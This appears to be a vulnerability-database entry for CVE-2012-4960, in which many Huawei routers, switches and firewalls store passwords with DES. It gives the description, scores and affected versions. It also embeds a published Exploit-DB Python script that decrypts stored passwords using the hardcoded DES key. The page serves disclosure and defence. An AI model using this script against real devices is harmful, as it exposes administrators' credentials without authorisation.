CVE-2012-4960 : Detail

CVE-2012-4960

A02-Cryptographic Failures
0.77%V3
Network
2013-06-20
13h00 +00:00
2013-08-22
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-310 Category : Cryptographic Issues
Weaknesses in this category are related to the design and implementation of data confidentiality and integrity. Frequently these deal with the use of encoding techniques, encryption libraries, and hashing algorithms. The weaknesses in this category could lead to a degradation of the quality data if they are not addressed.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38020

Publication date : 2012-11-12 23h00 +00:00
Author : Roberto Paleari
EDB Verified : Yes

source: https://www.securityfocus.com/bid/56510/info Multiple Huawei products are prone to a weak password encryption weakness. Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks. The following are vulnerable: Huawei Quidway series Huawei CX600 V600R001 Huawei CX600 V600R003C00SPC900 Huawei ME60 V600R002C07 and prior versions AR 19/29/49 R2207 and prior versions from Crypto.Cipher import DES def decode_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!') def ascii_to_binary(s): assert len(s) == 24 out = [0]*18 i = 0 j = 0 for i in range(0, len(s), 4): y = decode_char(s[i + 0]) y = (y << 6) & 0xffffff k = decode_char(s[i + 1]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i + 2]) y = (y | k) & 0xffffff y = (y << 6) & 0xffffff k = decode_char(s[i + 3]) y = (y | k) & 0xffffff out[j+2] = chr(y & 0xff) out[j+1] = chr((y>>8) & 0xff) out[j+0] = chr((y>>16) & 0xff) j += 3 return "".join(out) def decrypt_password(p): r = ascii_to_binary(p) r = r[:16] d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB) r = d.decrypt(r) return r.rstrip("\x00")

Products Mentioned

Configuraton 0

Huawei>>Acu >> Version v100r003c01spc100

Huawei>>Acu >> Version v200r001c00

Huawei>>Acu >> Version v200r001c00spc100

Huawei>>Ar_19\/29\/49 >> Version To (including) r2207

Huawei>>Ar_g3 >> Version v200r001c00

Huawei>>Ar_g3 >> Version v200r001c01

Huawei>>Ar_g3 >> Version v200r002c00spc200

Huawei>>Atn >> Version v200r001c00

Huawei>>Atn >> Version v200r001c01

Huawei>>Cx200 >> Version v100r005

Huawei>>Cx300 >> Version v100r005

Huawei>>Cx600 >> Version v200r002

Huawei>>Cx600 >> Version v600r001

Huawei>>Cx600 >> Version v600r002

Huawei>>Cx600 >> Version v600r003

Huawei>>E200_usg2200 >> Version To (including) v200r003c00

Huawei>>E200_usg5100 >> Version To (including) v200r003c00

Huawei>>E200e-b >> Version To (including) v100r005c01

Huawei>>E200e-c >> Version To (including) v200r003c00

Huawei>>E200e-usg2100 >> Version To (including) v100r005c01

Huawei>>E200e-x1 >> Version To (including) v100r005c01

Huawei>>E200e-x2 >> Version To (including) v100r005c01

Huawei>>E200x3 >> Version To (including) v200r003c00

Huawei>>E200x5 >> Version To (including) v200r003c00

Huawei>>E200x7 >> Version To (including) v200r003c00

Huawei>>Eudemon_8080e >> Version To (including) v100r003c00

Huawei>>Eudemon_8160e >> Version To (including) v100r003c00

Huawei>>Eudemon_usg5300 >> Version To (including) v200r001

Huawei>>Eudemon_usg5500 >> Version To (including) v200r002

Huawei>>Eudemon_usg9300 >> Version To (including) v100r003c00

Huawei>>Eudemon_usg9500 >> Version To (including) v200r001c00spc600

Huawei>>Eudemon1000 >> Version To (including) v200r006c02

Huawei>>Eudemon1000e-u >> Version To (including) v200r001

Huawei>>Eudemon1000e-x >> Version To (including) v200r002

Huawei>>Eudemon100e >> Version v200r007

Huawei>>Eudemon200 >> Version v200r001

Huawei>>Eudemon300 >> Version To (including) v200r006c02

Huawei>>Eudemon500 >> Version To (including) v200r006c02

Huawei>>Eudemon8000e-x >> Version To (including) v200r001c00spc600

Huawei>>H3c_ar\(oem_in\) >> Version To (including) r2209

Huawei>>Ma5200g >> Version v200r003

Huawei>>Ma5200g >> Version v300r003

Huawei>>Me60 >> Version v100r005

Huawei>>Me60 >> Version v100r006

Huawei>>Me60 >> Version v600r002

Huawei>>Me60 >> Version v600r003

Huawei>>Me60 >> Version v600r005c00spc600

Huawei>>Ne20 >> Version v200r005

Huawei>>Ne20e-x6 >> Version v300r005

Huawei>>Ne40 >> Version v300r005

Huawei>>Ne40e >> Version v300r005

Huawei>>Ne40e >> Version v600r001

Huawei>>Ne40e\/80e >> Version v600r002

Huawei>>Ne40e\/80e >> Version v600r003

Huawei>>Ne5000e >> Version v300r007

Huawei>>Ne5000e >> Version v800r002

Huawei>>Ne80 >> Version v300r005

Huawei>>Ne80e >> Version v600r001

Huawei>>Ne80e >> Version v600r002

Huawei>>Ne80e >> Version v600r003

Huawei>>Nip100 >> Version v100r001

Huawei>>Nip1000 >> Version v100r001

Huawei>>Nip200 >> Version v100r001

Huawei>>Nip2100 >> Version v100r001c00

Huawei>>Nip2200 >> Version v100r001c00

Huawei>>Nip5100 >> Version v100r001c00

Huawei>>S2300 >> Version v100r002

Huawei>>S2300 >> Version v100r003

Huawei>>S2300 >> Version v100r005

Huawei>>S2300 >> Version v100r006

Huawei>>S2700 >> Version v100r006

Huawei>>S3300 >> Version v100r002

Huawei>>S3300 >> Version v100r003

Huawei>>S3300 >> Version v100r005

Huawei>>S3300 >> Version v100r006

Huawei>>S3300hi >> Version v100r006

Huawei>>S3300hi >> Version v200r001

Huawei>>S3700 >> Version v100r005

Huawei>>S3700 >> Version v100r006

Huawei>>S3700 >> Version v200r001

Huawei>>S5300 >> Version v100r002

Huawei>>S5300 >> Version v100r003

Huawei>>S5300 >> Version v100r005

Huawei>>S5300 >> Version v100r006

Huawei>>S5300hi >> Version v100r006

Huawei>>S5300hi >> Version v200r001

Huawei>>S5306 >> Version v100r006

Huawei>>S5306 >> Version v200r001

Huawei>>S5700 >> Version v100r005

Huawei>>S5700 >> Version v100r006

Huawei>>S5700 >> Version v200r001

Huawei>>S6300 >> Version v100r006

Huawei>>S6300 >> Version v200r001

Huawei>>S6700 >> Version v100r006

Huawei>>S6700 >> Version v200r001

Huawei>>S7700 >> Version v100r003

Huawei>>S7700 >> Version v100r006

Huawei>>S9300 >> Version v100r001

Huawei>>S9300 >> Version v100r002

Huawei>>S9300 >> Version v100r003

Huawei>>S9300 >> Version v100r006

Huawei>>Svn2000 >> Version v200r001c00

Huawei>>Svn3000 >> Version v100r002c02spc802b041

Huawei>>Svn5000 >> Version v200r001c00

Huawei>>Svn5300 >> Version v100r001c01b019

Huawei>>Wlan_ac_6605 >> Version v200r001c00

Huawei>>Wlan_ac_6605 >> Version v200r001c00spc100

References

http://www.kb.cert.org/vuls/id/948096
Tags : third-party-advisory, x_refsource_CERT-VN